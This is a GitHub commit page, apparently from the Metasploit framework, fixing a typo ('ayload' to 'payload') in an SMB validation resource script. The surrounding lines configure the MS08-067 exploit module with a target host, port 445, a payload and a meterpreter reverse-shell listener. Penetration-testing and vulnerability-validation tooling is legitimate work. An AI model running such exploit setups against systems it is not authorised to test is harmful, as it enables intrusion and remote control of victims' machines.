Skip to content

Commit c4c093b

Browse files
committed
Method typo fix.
1 parent d8b2e7a commit c4c093b

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

scripts/resource/smb_validate.rc

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -80,7 +80,7 @@ def validate_ms08_067(vuln)
8080
mod = ms08_067_netapi_mod
8181
mod.datastore['RHOST'] = vuln.host.address
8282
mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445
83-
mod.datastore['PAYLOAD'] = get_x86_ayload_name
83+
mod.datastore['PAYLOAD'] = get_x86_payload_name
8484
mod.datastore['LHOST'] = get_lhost
8585
mod.datastore['LPORT'] = get_x86_meterpreter_port
8686
print_status("Validating MS08-067 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}")

0 commit comments

Comments
 (0)